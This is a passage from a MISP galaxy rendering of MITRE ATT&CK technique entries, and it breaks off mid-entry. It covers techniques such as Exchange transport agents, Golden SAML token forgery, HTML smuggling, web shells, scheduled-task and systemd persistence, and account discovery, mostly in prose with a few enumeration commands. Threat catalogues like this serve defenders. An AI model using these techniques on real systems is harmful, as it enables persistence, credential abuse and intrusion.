Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer defined tasks.

Adversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary.

The tag is: misp-galaxy:mitre-attack-pattern="Transport Agent - T1505.002"

Table 6023. Table References

Links

https://attack.mitre.org/techniques/T1505/002

https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help

https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf

SAML Tokens - T1606.002

An adversary may forge SAML tokens with any permissions claims and lifetimes if they possess a valid SAML token-signing certificate.(Citation: Microsoft SolarWinds Steps) The default lifetime of a SAML token is one hour, but the validity period can be specified in the <code>NotOnOrAfter</code> value of the <code>conditions …​</code> element in a token. This value can be changed using the <code>AccessTokenLifetime</code> in a <code>LifetimeTokenPolicy</code>.(Citation: Microsoft SAML Token Lifetimes) Forged SAML tokens enable adversaries to authenticate across services that use SAML 2.0 as an SSO (single sign-on) mechanism.(Citation: Cyberark Golden SAML)

An adversary may utilize [Private Keys](https://attack.mitre.org/techniques/T1552/004) to compromise an organization’s token-signing certificate to create forged SAML tokens. If the adversary has sufficient permissions to establish a new federation trust with their own Active Directory Federation Services (AD FS) server, they may instead generate their own trusted token-signing certificate.(Citation: Microsoft SolarWinds Customer Guidance) This differs from [Steal Application Access Token](https://attack.mitre.org/techniques/T1528) and other similar behaviors in that the tokens are new and forged by the adversary, rather than stolen or intercepted from legitimate users.

An adversary may gain administrative Azure AD privileges if a SAML token is forged which claims to represent a highly privileged account. This may lead to [Use Alternate Authentication Material](https://attack.mitre.org/techniques/T1550), which may bypass multi-factor and other authentication protection mechanisms.(Citation: Microsoft SolarWinds Customer Guidance)

The tag is: misp-galaxy:mitre-attack-pattern="SAML Tokens - T1606.002"

Table 6024. Table References

Links

https://attack.mitre.org/techniques/T1606/002

https://blogs.microsoft.com/on-the-issues/2020/12/13/customers-protect-nation-state-cyberattacks/

https://docs.microsoft.com/en-us/azure/active-directory/develop/active-directory-configurable-token-lifetimes

https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/

https://www.cyberark.com/resources/threat-research-blog/golden-saml-newly-discovered-attack-technique-forges-authentication-to-cloud-apps

https://www.sygnia.co/golden-saml-advisory

HTML Smuggling - T1027.006

Adversaries may smuggle data and files past content filters by hiding malicious payloads inside of seemingly benign HTML files. HTML documents can store large binary objects known as JavaScript Blobs (immutable data that represents raw bytes) that can later be constructed into file-like objects. Data may also be stored in Data URLs, which enable embedding media type or MIME files inline of HTML documents. HTML5 also introduced a download attribute that may be used to initiate file downloads.(Citation: HTML Smuggling Menlo Security 2020)(Citation: Outlflank HTML Smuggling 2018)

Adversaries may deliver payloads to victims that bypass security controls through HTML Smuggling by abusing JavaScript Blobs and/or HTML5 download attributes. Security controls such as web content filters may not identify smuggled malicious files inside of HTML/JS files, as the content may be based on typically benign MIME types such as <code>text/plain</code> and/or <code>text/html</code>. Malicious files or data can be obfuscated and hidden inside of HTML files through Data URLs and/or JavaScript Blobs and can be deobfuscated when they reach the victim (i.e. [Deobfuscate/Decode Files or Information](https://attack.mitre.org/techniques/T1140)), potentially bypassing content filters.

For example, JavaScript Blobs can be abused to dynamically generate malicious files in the victim machine and may be dropped to disk by abusing JavaScript functions such as <code>msSaveBlob</code>.(Citation: HTML Smuggling Menlo Security 2020)(Citation: MSTIC NOBELIUM May 2021)(Citation: Outlflank HTML Smuggling 2018)(Citation: nccgroup Smuggling HTA 2017)

The tag is: misp-galaxy:mitre-attack-pattern="HTML Smuggling - T1027.006"

Table 6025. Table References

Links

https://attack.mitre.org/techniques/T1027/006

https://outflank.nl/blog/2018/08/14/html-smuggling-explained/

https://research.nccgroup.com/2017/08/08/smuggling-hta-files-in-internet-explorer-edge/

https://www.menlosecurity.com/blog/new-attack-alert-duri

https://www.microsoft.com/security/blog/2021/05/27/new-sophisticated-email-based-attack-from-nobelium/

Upload Tool - T1608.002

Adversaries may upload tools to third-party or adversary controlled infrastructure to make it accessible during targeting. Tools can be open or closed source, free or commercial. Tools can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Adversaries may upload tools to support their operations, such as making a tool available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.

Tools may be placed on infrastructure that was previously purchased/rented by the adversary ([Acquire Infrastructure](https://attack.mitre.org/techniques/T1583)) or was otherwise compromised by them ([Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)).(Citation: Dell TG-3390) Tools can also be staged on web services, such as an adversary controlled GitHub repo, or on Platform-as-a-Service offerings that enable users to easily provision applications.(Citation: Dragos Heroku Watering Hole)(Citation: Malwarebytes Heroku Skimmers)(Citation: Intezer App Service Phishing)

Adversaries can avoid the need to upload a tool by having compromised victim machines download the tool directly from a third-party hosting location (ex: a non-adversary controlled GitHub repo), including the original hosting site of the tool.

The tag is: misp-galaxy:mitre-attack-pattern="Upload Tool - T1608.002"

Table 6026. Table References

Links

https://attack.mitre.org/techniques/T1608/002

https://www.dragos.com/blog/industry-news/a-new-water-watering-hole/

https://www.intezer.com/blog/malware-analysis/kud-i-enter-your-server-new-vulnerabilities-in-microsoft-azure/

https://www.malwarebytes.com/blog/news/2019/12/theres-an-app-for-that-web-skimmers-found-on-paas-heroku

https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

Domain Groups - T1069.002

Adversaries may attempt to find domain-level groups and permission settings. The knowledge of domain-level permission groups can help adversaries determine which groups exist and which users belong to a particular group. Adversaries may use this information to determine which users have elevated permissions, such as domain administrators.

Commands such as <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q group</code> on macOS, and <code>ldapsearch</code> on Linux can list domain-level groups.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Groups - T1069.002"

Table 6027. Table References

Links

https://attack.mitre.org/techniques/T1069/002

Domain Accounts - T1078.002

Adversaries may obtain and abuse credentials of a domain account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion.(Citation: TechNet Credential Theft) Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover users, administrators, and services.(Citation: Microsoft AD Accounts)

Adversaries may compromise domain accounts, some with a high level of privileges, through various means such as [OS Credential Dumping](https://attack.mitre.org/techniques/T1003) or password reuse, allowing access to privileged resources of the domain.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Accounts - T1078.002"

Table 6028. Table References

Links

https://attack.mitre.org/techniques/T1078/002

https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-accounts

https://technet.microsoft.com/en-us/library/dn487457.aspx

https://technet.microsoft.com/en-us/library/dn535501.aspx

https://ubuntu.com/server/docs/service-sssd

Domain Account - T1087.002

Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges.

Commands such as <code>net user /domain</code> and <code>net group /domain</code> of the [Net](https://attack.mitre.org/software/S0039) utility, <code>dscacheutil -q group</code>on macOS, and <code>ldapsearch</code> on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including <code>Get-ADUser</code> and <code>Get-ADGroupMember</code> may enumerate members of Active Directory groups.

The tag is: misp-galaxy:mitre-attack-pattern="Domain Account - T1087.002"

Table 6029. Table References

Links

https://attack.mitre.org/techniques/T1087/002

Stripped Payloads - T1027.008

Adversaries may attempt to make a payload difficult to analyze by removing symbols, strings, and other human readable information. Scripts and executables may contain variables names and other strings that help developers document code functionality. Symbols are often created by an operating system’s linker when executable payloads are compiled. Reverse engineers use these symbols and strings to analyze code and to identify functionality in payloads.(Citation: Mandiant golang stripped binaries explanation)(Citation: intezer stripped binaries elf files 2018)

Adversaries may use stripped payloads in order to make malware analysis more difficult. For example, compilers and other tools may provide features to remove or obfuscate strings and symbols. Adversaries have also used stripped payload formats, such as run-only AppleScripts, a compiled and stripped version of [AppleScript](https://attack.mitre.org/techniques/T1059/002), to evade detection and analysis. The lack of human-readable information may directly hinder detection and analysis of payloads.(Citation: SentinelLabs reversing run-only applescripts 2021)

The tag is: misp-galaxy:mitre-attack-pattern="Stripped Payloads - T1027.008"

Table 6030. Table References

Links

https://attack.mitre.org/techniques/T1027/008

https://www.intezer.com/blog/malware-analysis/executable-linkable-format-101-part-2-symbols/

https://www.mandiant.com/resources/blog/golang-internals-symbol-recovery

https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/

Embedded Payloads - T1027.009

Adversaries may embed payloads within other files to conceal malicious content from defenses. Otherwise seemingly benign files (such as scripts and executables) may be abused to carry and obfuscate malicious payloads and content. In some cases, embedded payloads may also enable adversaries to [Subvert Trust Controls](https://attack.mitre.org/techniques/T1553) by not impacting execution controls such as digital signatures and notarization tickets.(Citation: Sentinel Labs)

Adversaries may embed payloads in various file formats to hide payloads.(Citation: Microsoft Learn) This is similar to [Steganography](https://attack.mitre.org/techniques/T1027/003), though does not involve weaving malicious content into specific bytes and patterns related to legitimate digital media formats.(Citation: GitHub PSImage)

For example, adversaries have been observed embedding payloads within or as an overlay of an otherwise benign binary.(Citation: Securelist Dtrack2) Adversaries have also been observed nesting payloads (such as executables and run-only scripts) inside a file of the same format.(Citation: SentinelLabs reversing run-only applescripts 2021)

Embedded content may also be used as [Process Injection](https://attack.mitre.org/techniques/T1055) payloads used to infect benign system processes.(Citation: Trend Micro) These embedded then injected payloads may be used as part of the modules of malware designed to provide specific features such as encrypting C2 communications in support of an orchestrator module. For example, an embedded module may be injected into default browsers, allowing adversaries to then communicate via the network.(Citation: Malware Analysis Report ComRAT)

The tag is: misp-galaxy:mitre-attack-pattern="Embedded Payloads - T1027.009"

Table 6031. Table References

Links

https://attack.mitre.org/techniques/T1027/009

https://github.com/peewpw/Invoke-PSImage

https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-shllink/c41e062d-f764-4f13-bd4f-ea812ab9a4d1

https://securelist.com/my-name-is-dtrack/93338/

https://www.cisa.gov/uscert/ncas/analysis-reports/ar20-303a

https://www.sentinelone.com/labs/fade-dead-adventures-in-reversing-malicious-run-only-applescripts/

https://www.trendmicro.com/en_us/research/20/e/netwalker-fileless-ransomware-injected-via-reflective-loading.html

RC Scripts - T1037.004

Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.

Adversaries can establish persistence by adding a malicious binary path or shell commands to <code>rc.local</code>, <code>rc.common</code>, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script’s contents as root, resulting in persistence.

Adversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)

Several Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)

The tag is: misp-galaxy:mitre-attack-pattern="RC Scripts - T1037.004"

Table 6032. Table References

Links

http://manpages.ubuntu.com/manpages/bionic/man8/systemd-rc-local-generator.8.html

https://attack.mitre.org/techniques/T1037/004

https://developer.apple.com/library/archive/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/CreatingLaunchdJobs.html

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html

https://iranthreats.github.io/resources/attribution-flying-rocket-kitten/

https://www.intezer.com/blog-hiddenwasp-malware-targeting-linux-systems/

https://www.intezer.com/blog/research/kaiji-new-chinese-linux-malware-turning-to-golang/

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Scheduled Task - T1053.005

Adversaries may abuse the Windows Task Scheduler to perform task scheduling for initial or recurring execution of malicious code. There are multiple ways to access the Task Scheduler in Windows. The [schtasks](https://attack.mitre.org/software/S0111) utility can be run directly on the command line, or the Task Scheduler can be opened through the GUI within the Administrator Tools section of the Control Panel. In some cases, adversaries have used a .NET wrapper for the Windows Task Scheduler, and alternatively, adversaries have used the Windows netapi32 library to create a scheduled task.

The deprecated [at](https://attack.mitre.org/software/S0110) utility could also be abused by adversaries (ex: [At](https://attack.mitre.org/techniques/T1053/002)), though <code>at.exe</code> can not access tasks created with <code>schtasks</code> or the Control Panel.

An adversary may use Windows Task Scheduler to execute programs at system startup or on a scheduled basis for persistence. The Windows Task Scheduler can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a process under the context of a specified account (such as SYSTEM). Similar to [System Binary Proxy Execution](https://attack.mitre.org/techniques/T1218), adversaries have also abused the Windows Task Scheduler to potentially mask one-time execution under signed/trusted system processes.(Citation: ProofPoint Serpent)

Adversaries may also create "hidden" scheduled tasks (i.e. [Hide Artifacts](https://attack.mitre.org/techniques/T1564)) that may not be visible to defender tools and manual queries used to enumerate tasks. Specifically, an adversary may hide a task from schtasks /query and the Task Scheduler by deleting the associated Security Descriptor (SD) registry value (where deletion of this value must be completed using SYSTEM permissions).(Citation: SigmaHQ)(Citation: Tarrask scheduled task) Adversaries may also employ alternate methods to hide tasks, such as altering the metadata (e.g., Index value) within associated registry keys.(Citation: Defending Against Scheduled Task Attacks in Windows Environments)

The tag is: misp-galaxy:mitre-attack-pattern="Scheduled Task - T1053.005"

Table 6033. Table References

Links

https://attack.mitre.org/techniques/T1053/005

https://blog.qualys.com/vulnerabilities-threat-research/2022/06/20/defending-against-scheduled-task-attacks-in-windows-environments

https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/audit-other-object-access-events

https://github.com/SigmaHQ/sigma/blob/master/rules/windows/registry/registry_delete/registry_delete_schtasks_hide_task_via_sd_value_removal.yml

https://social.technet.microsoft.com/Forums/en-US/e5bca729-52e7-4fcb-ba12-3225c564674c/scheduled-tasks-history-retention-settings?forum=winserver8gen

https://technet.microsoft.com/en-us/sysinternals/bb963902

https://technet.microsoft.com/library/dd315590.aspx

https://twitter.com/leoloobeek/status/939248813465853953

https://www.microsoft.com/security/blog/2022/04/12/tarrask-malware-uses-scheduled-tasks-for-defense-evasion/

https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain

Web Shell - T1505.003

Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server.(Citation: volexity_0day_sophos_FW)

In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (e.g. [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013)

The tag is: misp-galaxy:mitre-attack-pattern="Web Shell - T1505.003"

Table 6034. Table References

Links

https://attack.mitre.org/techniques/T1505/003

https://github.com/nsacyber/Mitigating-Web-Shells

https://www.fireeye.com/blog/threat-research/2013/08/breaking-down-the-china-chopper-web-shell-part-i.html

https://www.us-cert.gov/ncas/alerts/TA15-314A

https://www.volexity.com/blog/2022/06/15/driftingcloud-zero-day-sophos-firewall-exploitation-and-an-insidious-breach/

Systemd Timers - T1053.006

Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of malicious code. Systemd timers are unit files with file extension <code>.timer</code> that control services. Timers can be set to run on a calendar event or after a time span relative to a starting point. They can be used as an alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation: archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the <code>systemctl</code> command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation: Systemd Remote Control)

Each <code>.timer</code> file must have a corresponding <code>.service</code> file with the same name, e.g., <code>example.timer</code> and <code>example.service</code>. <code>.service</code> files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation: Linux man-pages: systemd January 2014) Privileged timers are written to <code>/etc/systemd/system/</code> and <code>/usr/lib/systemd/system</code> while user level are written to <code>~/.config/systemd/user/</code>.

An adversary may use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018) Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may also install user level timers to achieve user level persistence.(Citation: Falcon Sandbox smp: 28553b3a9d)

The tag is: misp-galaxy:mitre-attack-pattern="Systemd Timers - T1053.006"

Table 6035. Table References

Links

http://man7.org/linux/man-pages/man1/systemd.1.html

https://attack.mitre.org/techniques/T1053/006

https://gist.github.com/campuscodi/74d0d2e35d8fd9499c76333ce027345a

https://lists.archlinux.org/pipermail/aur-general/2018-July/034153.html

https://wiki.archlinux.org/index.php/Systemd/Timers

https://www.bleepingcomputer.com/news/security/malware-found-in-arch-linux-aur-package-repository/

https://www.hybrid-analysis.com/sample/28553b3a9d2ad4361d33d29ac4bf771d008e0073cec01b5561c6348a608f8dd7?environmentId=300

https://www.tecmint.com/control-systemd-services-on-remote-linux-server/

Startup Items - T1037.005

Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items.(Citation: Startup Items)

This is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, <code>/Library/StartupItems</code> isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), <code>StartupParameters.plist</code>, reside in the top-level directory.

An adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism.(Citation: Methods of Mac Malware Persistence) Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.

The tag is: misp-galaxy:mitre-attack-pattern="Startup Items - T1037.005"

Table 6036. Table References

Links

https://attack.mitre.org/techniques/T1037/005

https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html

https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf

Cloud Groups - T1069.003

Adversaries may attempt to find cloud groups and permission settings. The knowledge of cloud permission groups can help adversaries determine the particular roles of users and groups within an environment, as well as which users are associated with a particular group.

With authenticated access there are several tools that can be used to find permissions groups. The <code>Get-MsolRole</code> PowerShell cmdlet can be used to obtain roles and permissions groups for Exchange and Office 365 accounts (Citation: Microsoft Msolrole)(Citation: GitHub Raindance).

Azure CLI (AZ CLI) and the Google Cloud Identity Provider API also provide interfaces to obtain permissions groups. The command <code>az ad user get-member-groups</code> will list groups associated to a user account for Azure while the API endpoint <code>GET https://cloudidentity.googleapis.com/v1/groups</code>; lists group resources available to a user for Google.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)(Citation: Google Cloud Identity API Documentation) In AWS, the commands ListRolePolicies and ListAttachedRolePolicies allow users to enumerate the policies attached to a role.(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)

Adversaries may attempt to list ACLs for objects to determine the owner and other accounts with access to the object, for example, via the AWS <code>GetBucketAcl</code> API (Citation: AWS Get Bucket ACL). Using this information an adversary can target accounts with permissions to a given object or leverage accounts they have already compromised to access the object.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Groups - T1069.003"

Table 6037. Table References

Links

https://attack.mitre.org/techniques/T1069/003

https://cloud.google.com/identity/docs/reference/rest

https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetBucketAcl.html

https://docs.microsoft.com/en-us/cli/azure/ad/user?view=azure-cli-latest

https://docs.microsoft.com/en-us/powershell/module/msonline/get-msolrole?view=azureadps-1.0

https://github.com/True-Demon/raindance

https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/

https://www.blackhillsinfosec.com/red-teaming-microsoft-part-1-active-directory-leaks-via-azure/

Email Account - T1087.003

Adversaries may attempt to get a listing of email addresses and accounts. Adversaries may try to dump Exchange address lists such as global address lists (GALs).(Citation: Microsoft Exchange Address Lists)

In on-premises Exchange and Exchange Online, the<code>Get-GlobalAddressList</code> PowerShell cmdlet can be used to obtain email addresses and accounts from a domain using an authenticated session.(Citation: Microsoft getglobaladdresslist)(Citation: Black Hills Attacking Exchange MailSniper, 2016)

In Google Workspace, the GAL is shared with Microsoft Outlook users through the Google Workspace Sync for Microsoft Outlook (GWSMO) service. Additionally, the Google Workspace Directory allows for users to get a listing of other users within the organization.(Citation: Google Workspace Global Access List)

The tag is: misp-galaxy:mitre-attack-pattern="Email Account - T1087.003"

Table 6038. Table References

Links

https://attack.mitre.org/techniques/T1087/003

https://docs.microsoft.com/en-us/exchange/email-addresses-and-address-books/address-lists/address-lists?view=exchserver-2019

https://docs.microsoft.com/en-us/powershell/module/exchange/email-addresses-and-address-books/get-globaladdresslist

https://support.google.com/a/answer/166870?hl=en

https://www.blackhillsinfosec.com/attacking-exchange-with-mailsniper/

Local Accounts - T1078.003

Adversaries may obtain and abuse credentials of a local account as a means of gaining Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Local accounts are those configured by an organization for use by users, remote support, services, or for administration on a single system or service.

Local Accounts may also be abused to elevate privileges and harvest credentials through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Password reuse may allow the abuse of local accounts across a set of machines on a network for the purposes of Privilege Escalation and Lateral Movement.

The tag is: misp-galaxy:mitre-attack-pattern="Local Accounts - T1078.003"

Table 6039. Table References

Links

https://attack.mitre.org/techniques/T1078/003

IIS Components - T1505.004

Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as DLL files that export three functions: <code>Get{Extension/Filter}Version</code>, <code>Http{Extension/Filter}Proc</code>, and (optionally) <code>Terminate{Extension/Filter}</code>. IIS modules may also be installed to extend IIS web servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013)

Adversaries may install malicious ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP responses in order to distribute malicious commands/content to previously comprised hosts.(Citation: Microsoft ISAPI Filter Overview 2017)(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Extension All Incoming 2017)(Citation: Dell TG-3390)(Citation: Trustwave IIS Module 2013)(Citation: MMPC ISAPI Filter 2012)

Adversaries may also install malicious IIS modules to observe and/or modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports <code>RegisterModule</code>, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP requests.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Trustwave IIS Module 2013)(Citation: ESET IIS Malware 2021)

The tag is: misp-galaxy:mitre-attack-pattern="IIS Components - T1505.004"

Table 6040. Table References

Links

https://attack.mitre.org/techniques/T1505/004

https://docs.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview

https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms524610(v=vs.90)

https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525172(v=vs.90)

https://docs.microsoft.com/en-us/previous-versions/iis/6.0-sdk/ms525696(v=vs.90)

https://i.blackhat.com/USA21/Wednesday-Handouts/us-21-Anatomy-Of-Native-Iis-Malware-wp.pdf

https://researchcenter.paloaltonetworks.com/2018/01/unit42-oilrig-uses-rgdoor-iis-backdoor-targets-middle-east/

https://web.archive.org/web/20140804175025/http:/blogs.technet.com/b/mmpc/archive/2012/10/03/malware-signed-with-the-adobe-code-signing-certificate.aspx

https://web.archive.org/web/20170106175935/http:/esec-lab.sogeti.com/posts/2011/02/02/iis-backdoor.html

https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage

https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/the-curious-case-of-the-malicious-iis-module/

Network Topology - T1590.004

Adversaries may gather information about the victim’s network topology that can be used during targeting. Information about network topologies may include a variety of details, including the physical and/or logical arrangement of both external-facing and internal network environments. This information may also include specifics regarding network devices (gateways, routers, etc.) and other infrastructure.

Adversaries may gather this information in various ways, such as direct collection actions via [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598). Information about network topologies may also be exposed to adversaries via online or other accessible data sets (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594)).(Citation: DNS Dumpster) Gathering this information may reveal opportunities for other forms of reconnaissance (ex: [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).

The tag is: misp-galaxy:mitre-attack-pattern="Network Topology - T1590.004"

Table 6041. Table References

Links

https://attack.mitre.org/techniques/T1590/004

https://dnsdumpster.com/

Unix Shell - T1059.004

Adversaries may abuse Unix shell commands and scripts for execution. Unix shells are the primary command prompt on Linux and macOS systems, though many variations of the Unix shell exist (e.g. sh, bash, zsh, etc.) depending on the specific OS or distribution.(Citation: DieNet Bash)(Citation: Apple ZShell) Unix shells can control every aspect of a system, with certain commands requiring elevated privileges.

Unix shells also support scripts that enable sequential execution of commands as well as other typical programming operations such as conditionals and loops. Common uses of shell scripts include long or repetitive tasks, or the need to run the same set of commands on multiple systems.

Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with [SSH](https://attack.mitre.org/techniques/T1021/004). Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.

The tag is: misp-galaxy:mitre-attack-pattern="Unix Shell - T1059.004"

Table 6042. Table References

Links

https://attack.mitre.org/techniques/T1059/004

https://linux.die.net/man/1/bash

https://support.apple.com/HT208050

Cloud Accounts - T1078.004

Valid accounts in cloud environments may allow adversaries to perform actions to achieve Initial Access, Persistence, Privilege Escalation, or Defense Evasion. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application. Cloud Accounts can exist solely in the cloud or be hybrid joined between on-premises systems and the cloud through federation with other identity sources such as Windows Active Directory. (Citation: AWS Identity Federation)(Citation: Google Federating GC)(Citation: Microsoft Deploying AD Federation)

Service or user accounts may be targeted by adversaries through [Brute Force](https://attack.mitre.org/techniques/T1110), [Phishing](https://attack.mitre.org/techniques/T1566), or various other means to gain access to the environment. Federated accounts may be a pathway for the adversary to affect both on-premises systems and cloud environments.

An adversary may create long lasting [Additional Cloud Credentials](https://attack.mitre.org/techniques/T1098/001) on a compromised cloud account to maintain persistence in the environment. Such credentials may also be used to bypass security controls such as multi-factor authentication.

Cloud accounts may also be able to assume [Temporary Elevated Cloud Access](https://attack.mitre.org/techniques/T1548/005) or other privileges through various means within the environment. Misconfigurations in role assignments or role assumption policies may allow an adversary to use these mechanisms to leverage permissions outside the intended scope of the account. Such over privileged accounts may be used to harvest sensitive data from online storage accounts and databases through [Cloud API](https://attack.mitre.org/techniques/T1059/009) or other methods.

The tag is: misp-galaxy:mitre-attack-pattern="Cloud Accounts - T1078.004"

Table 6043. Table References

Links

https://attack.mitre.org/techniques/T1078/004

https://aws.amazon.com/identity/federation/

https://cloud.google.com/solutions/federating-gcp-with-active-directory-introduction

https://docs.microsoft.com/en-us/windows-server/identity/ad-fs/deployment/how-to-connect-fed-azure-adfs

Cloud Account - T1087.004

Adversaries may attempt to get a listing of cloud accounts. Cloud accounts are those created and configured by an organization for use by users, remote support, services, or for administration of resources within a cloud service provider or SaaS application.

With authenticated access there are several tools that can be used to find accounts. The <code>Get-MsolRoleMember</code> PowerShell cmdlet can be used to obtain account names given a role or permissions group in Office 365.(Citation: Microsoft msolrolemember)(Citation: GitHub Raindance) The Azure CLI (AZ CLI) also provides an interface to obtain user accounts with authenticated access to a domain. The command <code>az ad user list</code> will list all users within a domain.(Citation: Microsoft AZ CLI)(Citation: Black Hills Red Teaming MS AD Azure, 2018)

